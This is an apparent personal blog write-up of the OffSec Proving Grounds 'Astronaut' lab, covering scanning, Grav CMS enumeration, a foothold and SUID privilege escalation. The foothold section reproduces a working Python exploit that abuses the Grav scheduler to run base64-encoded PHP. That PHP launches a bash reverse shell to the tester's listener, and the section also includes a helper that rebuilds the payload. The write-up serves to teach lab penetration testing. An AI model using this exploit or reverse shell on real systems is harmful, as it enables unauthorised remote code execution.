The Summary

| Field | Value |
| --- | --- |
| Platform Site | OffSec Proving Grounds (Practice) |
| Hostname | astronaut |
| Domain | astronaut.offsec |
| Operating System / Architecture | Linux / x86-64 |
| Rating | Easy |

This is a write-up for the “Astronaut” vulnerable machine from the Offensive Security Proving Grounds (Practice) labs. I will show the testing process and the successful exploitation of the machine, from initial scanning to obtaining the proof flag.

Within the report, I will expand on certain aspects of the test to provide a more granular explanation of areas which are of interest (mainly to the author).

At the end, there is a debriefing section reviewing the test and the creation of this report.

The Attack

Scanning & Prelims

After setting up the test environment, I run an Nmap scan. Below is the command I like to use, with a breakdown, followed by the scan output.

Nmap Command

nmap -T4 -A -p- xx.xx.xx.xx -oA nmap-XXXXXXX --webxml

- nmap –> the application
- -T4 –> timing template set to aggressive (4)
- -A –> enables OS detection, version detection, script scanning, and traceroute
- -p- –> scans all 65535 TCP ports
- xx.xx.xx.xx –> target IP address
- -oA –> outputs all major file types: normal, grepable, and XML
- nmap-XXXXXXX –> base name of the output files (chosen by the tester)
- --webxml –> references the online Nmap stylesheet in the XML file, so the XML report can be moved to and viewed easily on another machine

Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-02 12:02 EDT

Nmap scan report for astronaut.offsec (192.168.217.12)

Host is up (0.032s latency).

Not shown: 65533 closed tcp ports (reset)

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 3072 984e5de1e697296fd9e0d482a8f64f3f (RSA)

| 256 5723571ffd7706be256661146dae5e98 (ECDSA)

|_ 256 c79baad5a6333591341eefcf61a8301c (ED25519)

80/tcp open http Apache httpd 2.4.41

|_http-title: Index of /

| http-ls: Volume /

| SIZE TIME FILENAME

| - 2021-03-17 17:46 grav-admin/

|_

|_http-server-header: Apache/2.4.41 (Ubuntu)

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint:

OS:SCAN(V=7.93%E=4%D=5/2%OT=22%CT=1%CU=35305%PV=Y%DS=4%DC=T%G=Y%TM=6633B933

OS:%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=103%TI=Z%II=I%TS=A)OPS(O1=M5

OS:51ST11NW7%O2=M551ST11NW7%O3=M551NNT11NW7%O4=M551ST11NW7%O5=M551ST11NW7%O

OS:6=M551ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%D

OS:F=Y%T=40%W=FAF0%O=M551NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0

OS:%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T

OS:6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=C46

OS:C%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
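The port table in the output above is plain text, so you can also extract it programmatically. That helps when juggling several targets. Below is a minimal Python sketch that assumes the normal (-oN style) layout shown above. The function name open_ports is hypothetical and not part of Nmap. For anything serious, the XML file produced by -oA is the sturdier source to parse.

```python
import re

# Matches rows of the "PORT STATE SERVICE VERSION" table in Nmap's normal
# output, e.g. "80/tcp open http Apache httpd 2.4.41". Layout is assumed
# from the scan above.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def open_ports(nmap_output: str) -> list[tuple[int, str, str, str]]:
    """Return (port, protocol, service, version) for every open port row."""
    results = []
    for line in nmap_output.splitlines():
        match = PORT_LINE.match(line.strip())
        if match and match.group(3) == "open":
            port, proto, _state, service, version = match.groups()
            results.append((int(port), proto, service, version or ""))
    return results


# A trimmed copy of the scan output above; script lines ("| ...") are ignored.
scan = """
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
80/tcp open http Apache httpd 2.4.41
|_http-title: Index of /
"""

for port, proto, service, version in open_ports(scan):
    print(f"{port}/{proto} {service} {version}")
```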

While scanning, I set up notes for this machine. I also edit the /etc/hosts file in Kali to associate a domain of my choosing with the IP address provided by the Platform Site. This entry is often edited during testing when new domains are found.
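That entry gets edited as new domains turn up, so here is a small Python sketch of the bookkeeping. It appends a hostname to an existing line for the same IP, or adds a new line if none exists. It only works on the file's text (writing /etc/hosts itself needs root), and add_hosts_name is a hypothetical helper name.

```python
def add_hosts_name(hosts_text: str, ip: str, hostname: str) -> str:
    """Return hosts-file text with `hostname` mapped to `ip`.

    If a line for `ip` already exists, the name is appended to it (keeping
    any trailing comment); otherwise a new "ip<TAB>hostname" line is added.
    """
    lines = hosts_text.splitlines()
    for i, line in enumerate(lines):
        data, sep, comment = line.partition("#")
        fields = data.split()
        if fields and fields[0] == ip:
            if hostname not in fields[1:]:
                names = " ".join(fields[1:] + [hostname])
                lines[i] = f"{ip}\t{names}" + (f" #{comment}" if sep else "")
            return "\n".join(lines) + "\n"
    lines.append(f"{ip}\t{hostname}")
    return "\n".join(lines) + "\n"


hosts = "127.0.0.1\tlocalhost\n"
hosts = add_hosts_name(hosts, "192.168.217.12", "astronaut.offsec")
print(hosts)
```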

Service Enumeration

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 3072 984e5de1e697296fd9e0d482a8f64f3f (RSA)

| 256 5723571ffd7706be256661146dae5e98 (ECDSA)

|_ 256 c79baad5a6333591341eefcf61a8301c (ED25519)

Experience tells me, “It’s never SSH”, so it is best to try other services first. If you want to be thorough, do a Google search for: OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 vulnerabilities. In cases like this, most results come from people testing other vulnerable machines.



80/tcp open http Apache httpd 2.4.41

|_http-title: Index of /

| http-ls: Volume /

| SIZE TIME FILENAME

| - 2021-03-17 17:46 grav-admin/

|_



|_http-server-header: Apache/2.4.41 (Ubuntu)

HTTP, now we’re talking. Accessing the website brings up the following:



Opening the directory brings up a default web page for Grav CMS. Some online searching shows that Grav CMS is a Content Management System for creating websites, focused on simplicity and ease of use. Its logo is an astronaut, which makes it clear how this machine got its name. Many creators of these machines name them as a clue to what is vulnerable.



Checking with Wappalyzer confirms the presence of Grav CMS and reveals other interesting information. The presence of PHP is worth noting for crafting potential payloads.

A Google search for “Grav CMS admin page” brings up some results, including a GitHub repository that lists the path of the admin page.

Several attempts with easy default credentials, such as admin:admin, failed.

I then checked searchsploit for any known vulnerabilities and exploits.

searchsploit GravCMS

The “Arbitrary YAML Write/Update (Unauthenticated)” exploit proved to be successful. Details in the next section.

The Foothold



The successful exploit is a Python script run from the attacker (Kali) machine. According to the documentation in the script, its creator goes by “legend” and the original author was Mehmet INCE. Thank you for your contributions.

Below is a screenshot of the script. I will provide a brief “How-to” to execute the exploit for those just wanting to break the machine. Later, as a learning exercise, I will provide a more detailed look into what is happening.

The script has the target IP address as http://192.168.1.2. This will need to be changed to the IP of our Astronaut machine.

- Simply Copy & Paste the Astronaut IP into the appropriate spot



Next, the script provides an author’s comment telling the user how to create the Base64-encoded command that goes into the payload (payload=b). That command is a Bash reverse shell, which the PHP payload writes to /tmp/rev.sh and runs.

- Copy the command into a Kali terminal, being sure to change the IP and port to your Kali IP and the port your netcat listener will use

Copy & paste the newly created string, along with the other changes, into the Python exploit.
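If you would rather not hand-edit the Base64 string, you can rebuild the same payload in Python from an IP and port. This is a sketch that assumes you keep the script’s /tmp/rev.sh approach unchanged. reverse_shell_b64 and build_payload are hypothetical helper names, and lhost/lport stand for your Kali IP and listener port.

```python
import base64


def reverse_shell_b64(lhost: str, lport: int) -> str:
    """Equivalent of: echo -ne "bash -i >& /dev/tcp/LHOST/LPORT 0>&1" | base64 -w0"""
    command = f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
    return base64.b64encode(command.encode()).decode()


def build_payload(lhost: str, lport: int) -> bytes:
    """Rebuild the script's PHP payload bytes with the attacker IP/port filled in."""
    b64 = reverse_shell_b64(lhost, lport)
    return (
        "/*<?php /**/\n"
        f"file_put_contents('/tmp/rev.sh',base64_decode('{b64}'));"
        "chmod('/tmp/rev.sh',0755);system('bash /tmp/rev.sh');\n"
    ).encode()


print(build_payload("192.168.45.155", 4444).decode())
```

In the exploit, the payload=b"""...""" assignment could then become payload = build_payload("192.168.45.155", 4444), with your own values.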

- NOTE: Be sure to include the proper path in the Astronaut IP address –>

http://xx.xx.xx.xx/grav-admin



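Set up a netcat listener on the port used in the Base64-encoded string (for example, nc -lvnp 4444). Save and execute the exploit. The exploit does not open the shell directly. It registers a scheduled job on the target with the schedule * * * * * (every minute), so the connection may take up to a minute to arrive.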



There is now a shell as user “www-data”. If you wish to move on to the privilege escalation section, no one’s stopping you. However, I am going to backtrack and explain the script. Below are code blocks from the original script, each followed by an explanation.

Script Breakdown

Below is the entire script. Beneath it, I break it down into smaller sections with explanations.

#!/usr/bin/python3

import requests
import sys
import re
import base64

target= "http://192.168.157.12/grav-admin"

#Change base64 encoded value with with below command.
#echo -ne "bash -i >& /dev/tcp/192.168.45.155/4444 0>&1" | base64 -w0

payload=b"""/*<?php /**/
file_put_contents('/tmp/rev.sh',base64_decode('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE1NS80NDQ0IDA+JjE='));chmod('/tmp/rev.sh',0755);system('bash /tmp/rev.sh');
"""

s = requests.Session()
r = s.get(target+"/admin")
adminNonce = re.search(r'admin-nonce" value="(.*)"',r.text).group(1)

if adminNonce != "" :
    url = target + "/admin/tools/scheduler"
    data = "admin-nonce="+adminNonce
    data +='&task=SaveDefault&data%5bcustom_jobs%5d%5bncefs%5d%5bcommand%5d=/usr/bin/php&data%5bcustom_jobs%5d%5bncefs%5d%5bargs%5d=-r%20eval%28base64_decode%28%22'+base64.b64encode(payload).decode('utf-8')+'%22%29%29%3b&data%5bcustom_jobs%5d%5bncefs%5d%5bat%5d=%2a%20%2a%20%2a%20%2a%20%2a&data%5bcustom_jobs%5d%5bncefs%5d%5boutput%5d=&data%5bstatus%5d%5bncefs%5d=enabled&data%5bcustom_jobs%5d%5bncefs%5d%5boutput_mode%5d=append'
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    r = s.post(target+"/admin/config/scheduler",data=data,headers=headers)

import requests

import sys

import re

import base64

target= "http://192.168.157.12/grav-admin"

The first step is to import modules. Modules are files of Python code (typically with a .py extension, though some, like sys, are built into the interpreter) that act like tools the script needs to run. Importing them is like taking tools out of a toolbox and setting them in front of you for a project. The section above imports the following Python modules for the script to use.

- requests –> allows the script to send HTTP/1.1 requests easily.
- re –> a set of Regular Expression facilities. Allows the script to check whether a given string matches or contains a certain pattern.
- sys –> a basic system module that is always available in Python. It is imported here but never actually used by the script.
- base64 –> provides Base64 encoding/decoding (conversion of binary data to printable ASCII characters and vice versa).

The target variable contains the URL of our target machine (Astronaut), including the /grav-admin path.

#Change base64 encoded value with with below command.

#echo -ne "bash -i >& /dev/tcp/192.168.45.155/4444 0>&1" | base64 -w0

payload=b"""/*<?php /**/

file_put_contents('/tmp/rev.sh',base64_decode('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE1NS80NDQ0IDA+JjE='));chmod('/tmp/rev.sh',0755);system('bash /tmp/rev.sh');

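"""

The script author’s comments (#) provide the command that builds a Bash reverse shell and encodes it in Base64. The payload itself is PHP code. It decodes that Base64 string, writes the result to /tmp/rev.sh, makes the file executable (chmod 0755), and runs it with bash. The encoding command breaks down as follows…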

echo -ne "bash -i >& /dev/tcp/192.168.45.155/4444 0>&1" | base64 -w0

- echo –> outputs the text provided to it.
- -ne –> -n tells echo not to output the trailing newline character. -e enables interpretation of backslash escapes, so special characters like \n (newline) are processed correctly if included.
- "bash -i >& /dev/tcp/192.168.45.155/4444 0>&1" –> the actual command that creates the reverse shell.
- bash -i –> starts an interactive Bash shell.
- >& –> redirects both standard output (stdout) and standard error (stderr) to the specified destination.
- /dev/tcp/192.168.xx.xx/4444 –> Bash opens a TCP connection to the IP address 192.168.xx.xx on port 4444. This is where Kali will be listening.
- 0>&1 –> redirects standard input (stdin) to the same destination as standard output (stdout). This ties the input and output streams of the Bash shell to the TCP connection.

| base64 -w0

- | –> a pipe. It takes the output of the command on its left (the echo command) and passes it as input to the command on its right (the base64 command).
- base64 –> encodes the input it receives into Base64, a text-based encoding scheme that represents binary data in an ASCII format.
- -w0 –> prevents the base64 command from wrapping its output. The encoded string stays on a single continuous line, which is often necessary for embedding the encoded data in scripts or web requests.
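To see what the encoding step produces, you can reproduce the same pipeline with Python’s base64 module. This sketch decodes the string embedded in the script (the equivalent of base64 -d). It also shows that leaving out -n, so that echo appends a newline, changes the end of the encoded string. The variable names are only illustrative.

```python
import base64

# The Base64 string embedded in the script's payload.
SCRIPT_B64 = "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE1NS80NDQ0IDA+JjE="
command = "bash -i >& /dev/tcp/192.168.45.155/4444 0>&1"

# Equivalent of "base64 -d": recover the command hidden in the script.
decoded = base64.b64decode(SCRIPT_B64).decode()
print(decoded)

# echo -n: no trailing newline, which reproduces the script's string exactly.
with_n = base64.b64encode(command.encode()).decode()
# Plain echo appends "\n", which changes the last Base64 characters.
without_n = base64.b64encode((command + "\n").encode()).decode()

print(with_n)     # ends in ...JjE=
print(without_n)  # ends in ...JjEK
```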

s = requests.Session()

r = s.get(target+"/admin")

adminNonce = re.search(r'admin-nonce" value="(.*)"',r.text).group(1)

This portion of the script establishes a session. A requests Session object, s, is created so that one session carries multiple requests and responses instead of each request starting fresh. The session keeps cookies between requests and reuses the underlying TCP connection. Keeping the cookies is likely what lets the nonce fetched by the GET request stay valid for the later POST.

The next line sends an HTTP GET request to the target “/admin” page.

In the third line, a regular expression (remember the re module?) extracts the admin-nonce value from the response. The admin-nonce is likely a CSRF token required for authenticated requests.

- It searches the HTML response (r.text) for the first occurrence of the pattern “admin-nonce" value="(.*)"”. The pattern looks for the admin-nonce field followed immediately by its value attribute. The (.*) part of the pattern captures the value inside the double quotes after “admin-nonce" value="”, and .group(1) returns that captured value. Because .* is greedy, the capture runs to the last double quote on that line, so it only returns a clean token when no other double quote follows the value on the same line.

NOTE: Regular Expressions are a bit complex. I am searching for a better way to learn and explain them.
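A quick way to get a feel for the pattern is to run it against a sample tag. The HTML line below is a made-up example, not Grav’s actual markup, and extract_nonce is a hypothetical helper. The sketch shows that the greedy (.*) keeps going to the last double quote on the line, while [^"]* stops at the first one. The helper also returns None when no nonce is found. In the original script, re.search would return None in that case, and .group(1) would raise an AttributeError before the != "" check is ever reached.

```python
import re


def extract_nonce(html: str):
    """Return the admin-nonce value, or None if the page has no nonce."""
    # [^"]* stops at the first closing quote, unlike the greedy (.*).
    match = re.search(r'admin-nonce" value="([^"]*)"', html)
    return match.group(1) if match else None


# Hypothetical form field; the real Grav markup may differ.
page = '<input type="hidden" name="admin-nonce" value="abc123" class="x">'

greedy = re.search(r'admin-nonce" value="(.*)"', page).group(1)
print(greedy)                           # abc123" class="x
print(extract_nonce(page))              # abc123
print(extract_nonce("<html></html>"))   # None
```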

if adminNonce != "" :
    url = target + "/admin/tools/scheduler"
    data = "admin-nonce="+adminNonce
    data +='&task=SaveDefault&data%5bcustom_jobs%5d%5bncefs%5d%5bcommand%5d=/usr/bin/php&data%5bcustom_jobs%5d%5bncefs%5d%5bargs%5d=-r%20eval%28base64_decode%28%22'+base64.b64encode(payload).decode('utf-8')+'%22%29%29%3b&data%5bcustom_jobs%5d%5bncefs%5d%5bat%5d=%2a%20%2a%20%2a%20%2a%20%2a&data%5bcustom_jobs%5d%5bncefs%5d%5boutput%5d=&data%5bstatus%5d%5bncefs%5d=enabled&data%5bcustom_jobs%5d%5bncefs%5d%5boutput_mode%5d=append'
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    r = s.post(target+"/admin/config/scheduler",data=data,headers=headers)

This section builds the malicious request. If the value for adminNonce is not empty, the script builds and sends a malicious POST request.

The script defines url = target + “/admin/tools/scheduler” but never uses it. The POST request actually goes to target + “/admin/config/scheduler” (the last line of the block).

- remember we previously set the target variable to Astronaut’s URL.

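The data variable starts with the token grabbed by the previous bit of code, followed by the other payload details. Once URL-decoded, the main fields are:

- command –> specifies /usr/bin/php as the command to run.
- args –> passes -r eval(base64_decode("...")); to php, so PHP decodes the Base64-encoded payload and runs it with eval.
- at –> sets the cron schedule to * * * * *, meaning the job runs every minute. This is why the shell can take up to a minute to arrive.
- status –> data[status][ncefs] is set to enabled, which switches the job (named ncefs) on.
- output_mode –> specifies how to handle the job’s output (append).

The headers dictionary sets the Content-Type to “application/x-www-form-urlencoded”, telling the server that the body is URL-encoded form data.

Finally, the script sends the POST request to the target, which saves the job so the payload is scheduled to run.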
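The hand-encoded data string is hard to read, so the sketch below decodes it with Python’s urllib.parse.parse_qsl and rebuilds the same fields with urlencode. NONCE and PAYLOAD are placeholders, and build_scheduler_form is a hypothetical helper, not part of the exploit. Building the form from a list of pairs also lets urlencode percent-encode characters such as + (common in Base64 output), which a form parser would otherwise read as a space.

```python
from urllib.parse import parse_qsl, urlencode


def build_scheduler_form(nonce: str, b64_payload: str, job: str = "ncefs") -> str:
    """Build the same form fields as the exploit's hand-encoded data string."""
    fields = [
        ("admin-nonce", nonce),
        ("task", "SaveDefault"),
        (f"data[custom_jobs][{job}][command]", "/usr/bin/php"),
        (f"data[custom_jobs][{job}][args]", f'-r eval(base64_decode("{b64_payload}"));'),
        (f"data[custom_jobs][{job}][at]", "* * * * *"),  # cron: every minute
        (f"data[custom_jobs][{job}][output]", ""),
        (f"data[status][{job}]", "enabled"),
        (f"data[custom_jobs][{job}][output_mode]", "append"),
    ]
    return urlencode(fields)


# The script's string, with placeholders in place of the nonce and payload.
SCRIPT_DATA = (
    "admin-nonce=NONCE"
    "&task=SaveDefault"
    "&data%5bcustom_jobs%5d%5bncefs%5d%5bcommand%5d=/usr/bin/php"
    "&data%5bcustom_jobs%5d%5bncefs%5d%5bargs%5d=-r%20eval%28base64_decode%28%22PAYLOAD%22%29%29%3b"
    "&data%5bcustom_jobs%5d%5bncefs%5d%5bat%5d=%2a%20%2a%20%2a%20%2a%20%2a"
    "&data%5bcustom_jobs%5d%5bncefs%5d%5boutput%5d="
    "&data%5bstatus%5d%5bncefs%5d=enabled"
    "&data%5bcustom_jobs%5d%5bncefs%5d%5boutput_mode%5d=append"
)

# keep_blank_values=True keeps the empty "output" field.
for key, value in parse_qsl(SCRIPT_DATA, keep_blank_values=True):
    print(f"{key} = {value}")
```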

Playing in Traffic

I have discovered a way to proxy the traffic from Python scripts through Burp Suite. It should provide a nice visual for what the exploit is sending.
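I won’t claim this is the only way, but one common approach with the requests library is to give the Session a proxies mapping that points at Burp’s proxy listener. The sketch below assumes Burp is listening on its default 127.0.0.1:8080. burp_session is a hypothetical helper name.

```python
import requests

# Assumed Burp proxy listener; change it if you moved Burp off the default.
BURP = "http://127.0.0.1:8080"


def burp_session(proxy: str = BURP) -> requests.Session:
    """Return a Session that sends all HTTP(S) traffic through Burp."""
    s = requests.Session()
    s.proxies.update({"http": proxy, "https": proxy})
    # Burp re-signs HTTPS traffic with its own CA, so certificate checks are
    # disabled here for lab use (alternatively, point verify at Burp's CA).
    s.verify = False
    return s


# In the exploit, "s = requests.Session()" would become:
# s = burp_session()
```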



The screenshot shows a GET request going to Astronaut’s admin page URL. Searching through the response body reveals the “admin-nonce” field and the value that the Python script is seeking.

The script then sends a POST request to the destination shown in the last line of our Python script (target+”/admin/config/scheduler”). The admin-nonce and its corresponding value have also been placed in the body of the request.



Scrolling further into the request body brings us to the other parameters the script sent. Most were generated in the lower portion of our Python script. If we hover the mouse over the larger block, Burp decodes the URL encoding and reveals a more readable version of the Base64-encoded payload we created.

Privilege Escalation



After trying several enumeration techniques, I found a working privilege escalation path: exploiting a binary with the SUID bit set. The SUID (Set User ID) bit is a file permission in Unix-like operating systems. When this bit is set on an executable file, any user who runs the file does so with the privileges of the file’s owner. If that owner is “root”, the program runs with root’s permissions.

Check for binaries with the SUID bit set by using the below command.

find / -perm -4000 2>/dev/null

This uses the “find” command, which recursively searches for files and directories starting from a given directory.

- / –> it starts searching in the root directory, thereby searching the entire file system.

- -perm -4000 –> looks for files that have at least the 4000 permission bit set, which is the SUID (Set User ID) permission. The leading - means the other permission bits are ignored.

- 2>/dev/null –> redirects the standard error output (file descriptor 2) into /dev/null, which is a sort of data black hole. Essentially, it discards all the error messages (mostly “Permission denied”), making the output cleaner to view.
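The same search can be sketched in Python with os.walk and the stat module, which makes the SUID test itself explicit: a file qualifies when its mode has the S_ISUID bit (octal 4000) set. This is a rough equivalent, not a drop-in replacement. It only checks file entries (not directories), skips anything it cannot read, and will be slower than find on a full filesystem. find_suid and has_suid are hypothetical names.

```python
import os
import stat


def has_suid(mode: int) -> bool:
    """True if the SUID bit (octal 4000) is set, like find's -perm -4000."""
    return bool(mode & stat.S_ISUID)


def find_suid(root: str = "/") -> list[str]:
    """Walk `root` and return paths of files with the SUID bit set."""
    hits = []
    # onerror swallows unreadable directories, much like 2>/dev/null.
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                # lstat does not follow symlinks (find's default behaviour).
                if has_suid(os.lstat(path).st_mode):
                    hits.append(path)
            except OSError:
                continue  # entry vanished or is unreadable; skip it
    return hits


if __name__ == "__main__":
    for path in find_suid("/"):
        print(path)
```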



The names of these binaries can then be entered into the search bar on the GTFOBins website, which catalogs ways that common Unix binaries can be abused, including when they have the SUID bit set. You can search every binary the command reveals (just the binary name at the end of the path). Experience speeds the process up: many binaries show up on nearly every machine you run the command on, and you will learn which ones bear no fruit.
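Once you have a feel for which results are noise, you can write that experience down as a simple filter. In the sketch below, COMMON_SUID is an assumed, non-exhaustive set of binaries that are SUID on many stock Linux installs, and unusual_suid is a hypothetical helper. Being common does not make a binary safe, so the filter only decides what to look up on GTFOBins first.

```python
import os

# Assumed, non-exhaustive list of binaries that are SUID on many stock
# Linux installs; extend or trim it from your own experience.
COMMON_SUID = {
    "passwd", "sudo", "su", "mount", "umount", "chsh", "chfn",
    "newgrp", "gpasswd", "fusermount", "ping",
}


def unusual_suid(paths: list[str]) -> list[str]:
    """Keep only paths whose binary name is not in COMMON_SUID."""
    return [p for p in paths if os.path.basename(p) not in COMMON_SUID]


# Example input shaped like the find output; the last path is hypothetical.
found = ["/usr/bin/passwd", "/usr/bin/sudo", "/usr/local/bin/example-binary"]
print(unusual_suid(found))
```

On a real target, you could feed it the saved output of the find command, for example unusual_suid(find_output.splitlines()), where find_output is whatever you captured.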

Further down the find output, there is an interesting binary.

Move to the section regarding SUID.



To execute, change your working directory to the location the “find / -perm” command stated the binary was in. Then Copy & Paste the commands into the terminal (one line per command).



To find the flag, change into root’s home directory (/root) and list the files (ls). For “proof” screenshots, I like to use a command string that prints the date, username, working directory, proof flag, and target machine’s IP.

The Debriefing

What went right?

I was able to exploit the machine from start to finish and create this write-up. It is my first attempt at putting something like this on the web, and I feel it looks pretty decent. Having read over it several times, I also feel it conveys the information well.

What went wrong?

Because this was my first attempt at making a report for the web, it took me an awfully long time. I hope subsequent reports go a little faster and are less frustrating. Compared to creating the blog report, breaking the machine was a breeze.

I had a large learning curve with just figuring out how to do everything while creating the content. Ironically, Grav CMS is designed for making this type of thing easier. And here I was, punching it in the face!

Lessons Learned

I will continue to learn and streamline my reporting process for the web. I became a bit clearer on formatting and on who my audience is. I suppose I am the audience, and if others find it useful (or not), so be it.

I am getting more particular about explaining each step. While breaking a machine, I tend to go at high speed in pursuit of the goal. Slowing down enough to step through what is going on is working well.

I have already learned interesting things, like how to proxy Python script traffic through Burp. I am also getting ideas for posts other than breaking machines. Perhaps describing some techniques I commonly use in a post and linking to it in my reports would be a good approach.